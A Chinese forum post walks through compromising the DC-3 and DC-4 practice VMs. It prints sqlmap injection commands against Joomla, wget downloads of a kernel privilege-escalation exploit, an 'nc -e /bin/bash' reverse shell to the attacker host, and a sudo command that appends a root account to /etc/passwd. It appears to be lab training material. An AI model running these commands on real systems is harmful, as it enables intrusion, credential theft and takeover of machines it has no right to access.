吾爱破解 - 52pojie.cn

 找回密码
 注册[Register]

QQ登录

只需一步,快速开始

查看: 3636|回复: 28
上一主题 下一主题
收起左侧

[CTF] DC3,DC4靶机详解

  [复制链接]
跳转到指定楼层
楼主
yunkof 发表于 2023-7-6 21:58 回帖奖励
本帖最后由 yunkof 于 2023-7-6 22:41 编辑

【DC系列03】DC-3靶机复盘

最近打了特别多的靶机,DC系列已经打完了,还打了一些别的靶机,有特别难的,也有很简单的,现在发现打靶机真的好玩,甚至有点上瘾,还学习到了很多工具的用法,陆续把DC系列发完就发别的靶机,再发一些工具的用法,教程中如果有看不懂的,或者觉得我少步骤的,留言就可以,我会补充的,放心,每天我都会在论坛冲浪,可能不发言,但一定会在论坛飘来飘去。
下载地址:https://www.five86.com/downloads.html
刚开始我的虚拟机导入靶机,打开时会出现这个错误,只需要添加一个硬盘就可以,选择IDE的。

image-20230627212438435

image-20230627212621242

然后我们扫描一下靶机ip地址

image-20230630204512930

扫出来以后再单独扫描一下这个网站。

image-20230630204531769

登陆这个ip以后指纹识别发现这个网站CMS是Joomla,我知道一个专门针对joomla的扫描工具,我们扫描一下。

image-20230701191857913

image-20230630211441771

我们扫描出两个重要内容,一个是joomla的版本,一个是他的登陆页面。

image-20230630211429434

我们针对这个版本搜索一下他的漏洞,发现刚好有一个可以利用的,我们下载下来。

image-20230630211950167

发现这是一个sql注入的漏洞,可以可以sqlmap这个工具实现sql注入,不懂的可以单独搜索一下sqlmap这个工具。

image-20230630212013471

sqlmap -u "http://192.168.102.132/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]
sqlmap -u "http://192.168.102.132/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" --tables  -p list[fullordering]
sqlmap -u "http://192.168.102.132/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" -T "#__users" --columns  -p list[fullordering]
sqlmap -u "http://192.168.102.132/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" -T "#__users" -C "name,password,username" --dump  -p list[fullordering]

经过一系列操作我们成功拿到了一个账号密码,但是密码是密文的。

image-20230630213139751

利用kali自带的john工具爆破一下密码,很快密码就出来了

image-20230630213314214

尝试登陆了一下这个后台,发现成功登陆了上去。

image-20230630213456497

在 这里面搜索了一圈,发现一个可以注入php代码的地方,经过尝试很轻易的就做了一个反弹shell。

image-20230630214512379

image-20230630214533811

这里面是有两个主页的模板,这里面有前端代码,可以自己新建php文件,也可以在原本php文件中插入代码。

image-20230630214549204

我点进来以后在html文件下面找到了个php文件,然后插入了一段反弹shell。然后关闭这个页面,在最上面一行Close File。

image-20230630213935984

点击预览,或者退出这个页面,重新点击这个模板。

image-20230630214636323

kali这边就拿到了反弹shell。

image-20230630214701977

用python美化一下命令行。

image-20230630214734410

在这里面找了一圈并没有发现有什么可以利用的东西,就想到了内核漏洞,专门搜索了一下这个内核漏洞,发现这个系统的发行版本是16.06,内核版本是4.40。

image-20230630215112707

搜索一下这个发行版本的漏洞,发现有合适的。

image-20230630220835063

下载后cat一下,里面有一个提权代码的路径,我们wget一个这个zip,下载到我们本机上。

image-20230630222547744

解压后发现两个文件,一个crasher.tar,一个exploit.tar,我们解压一下exploit.tar,解压出一个目录ebpf_mapfd_doubleput_exploit。

image-20230701214643357

image-20230630222524138

我们把ebpf_mapfd_doubleput_exploit里面的东西都拷贝到目标主机。

cd /tmp
wget 192.168.102.129/compile.sh
wget 192.168.102.129/doubleput.c
wget 192.168.102.129/hello.c
wget 192.168.102.129/suidhelper.c

然后我们运行./compil.sh。

运行完后出现一个doubleput文件,我们再运行一下./doubleput大概等1分钟就拿到root权限了。

image-20230701211318223

【DC系列04】DC-4靶机复盘

首先nmap扫ip,我这里扫出来ip了,然后对这个ip做一个单独的扫描。

image-20230703112412188

扫描ip的同时再扫描一下目录,其实目录并没有扫描出来一个什么,有个登陆地址但是转到主目录了。

image-20230703112516453

image-20230703112529681

搜寻了一圈并没有什么好利用的点,从这个登陆框很容易看出来登陆用户名是admin,可以根据这个进行一个爆破,很快密码就爆破出来了,是个弱密码。

image-20230703084602461

image-20230703084810940

进来以后发现有个Command,点击run发现这是一个ls命令,所以我们就抓包看看能不能修改一下

image-20230703113749032

看到这里空格是用+号代替了,我们尝试放一个反弹shell

image-20230703085133243

image-20230703140018938

nc+-e+/bin/bash+192.168.102.129+8888

kali这边监听一下,发现获取到了该靶机的webshell

image-20230703102404446

首先使用python命令美化一下命令行。

python3 -c "import pty;pty.spawn('/bin/bash')"

登陆以后在里面寻找了一下,发现在/home/jim/backups目录下有一个old-passwords.bak文件,这是一个旧密码文件,里面有很多密码,所以就猜测需要用到密码爆破。

image-20230703103328620

hydra爆破一下jim用户,很快密码就出来了。

image-20230703103640640

远程登陆一下jim用户。

image-20230703103711366

登陆到jim用户后在家目录找了一圈发现并没有可以利用的东西,但是在/var下有个mail目录,这是一个邮件目录,所以这里面可能有什么邮件信息比较关键。

image-20230703105317334

打开后发现有一个charles写给jim的邮件,里面有charles的密码,我们就尝试登陆一下charles用户。

image-20230703105405747

很轻松,顺利就登陆上去了。

image-20230703105906466

sudo -l一下发现在有个免密使用root权限的文件/usr/bin/teehee

teehee -help后发现这个文件执行后可以以root权限免密往另一个文件内容后追加内容,所以我们可以利用这个漏洞往/etc/passwd文件下追加一个root用户。

image-20230703112133653

image-20230703112154816

我们的密码追加时候需要以密文的方式追加,如果直接追加明文密码登陆时候会鉴权失败。

这个命令是针对我们的密码和用户输出一个密码的密文。

#得到我们要添加的用户的密码。
perl -le 'print crypt("123456", "tang6")'

image-20230703112219827

利用sudo teehee和echo命令就可以追加到/etc/passwd

su tang6登陆一下,密码123456,发现已经是root权限了。

echo "tang6:tarRU/F9EJjRU:0:0:root::/bin/bash" | sudo teehee -a /etc/passwd

image-20230703112249019

免费评分

参与人数 10威望 +1 吾爱币 +31 热心值 +9 收起 理由
笙若 + 1 + 1 谢谢@Thanks!
Hmily + 1 + 20 + 1 感谢发布原创作品,吾爱破解论坛因你更精彩!
wdraemv + 1 + 1 热心回复!
amd123 + 1 + 1 我很赞同!
dodolock + 1 + 1 谢谢@Thanks!
RickSanchez + 1 + 1 我很赞同!
lcstwp + 1 + 1 用心讨论,共获提升!
henaliu + 1 热心回复!
billsmiless + 3 + 1 谢谢@Thanks!
youxide + 1 + 1 我很赞同!

查看全部评分

发帖前要善用论坛搜索功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。

推荐
sxaksy 发表于 2023-7-7 21:15
打卡,打卡
发布脱文、破解、算法分析文章时,请不要把正文分为多个回帖进行连接,请整理到一篇正文中发布。(如果后续更新一系列教程可在主题内增加导航链接)
2: 发布脱文、破解、算法分析文章时,请把试炼程序一并上传,便于会员们学习。
沙发
li083m 发表于 2023-7-6 22:20
3#
tek2y 发表于 2023-7-6 23:27
4#
sanle2014 发表于 2023-7-6 23:43
厉害了,6666
5#
greattony 发表于 2023-7-7 00:04
需要慢慢消化,感谢
6#
l441669899 发表于 2023-7-7 06:56
厉害,感谢楼主分享!
7#
cyylszsb 发表于 2023-7-7 07:48
厉害了,回去实操一下
8#
lcstwp 发表于 2023-7-7 09:46
非常详细!学习到了
9#
D3D行者云 发表于 2023-7-7 15:05

厉害,学习了
10#
abs9668 发表于 2023-7-7 16:01
感谢分享~~
您需要登录后才可以回帖 登录 | 注册[Register]

本版积分规则

返回列表

RSS订阅|小黑屋|处罚记录|联系我们|吾爱破解 - LCG - LSG ( 京ICP备16042023号 | 京公网安备 11010502030087号 )

GMT+8, 2024-11-15 09:30

Powered by Discuz!

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表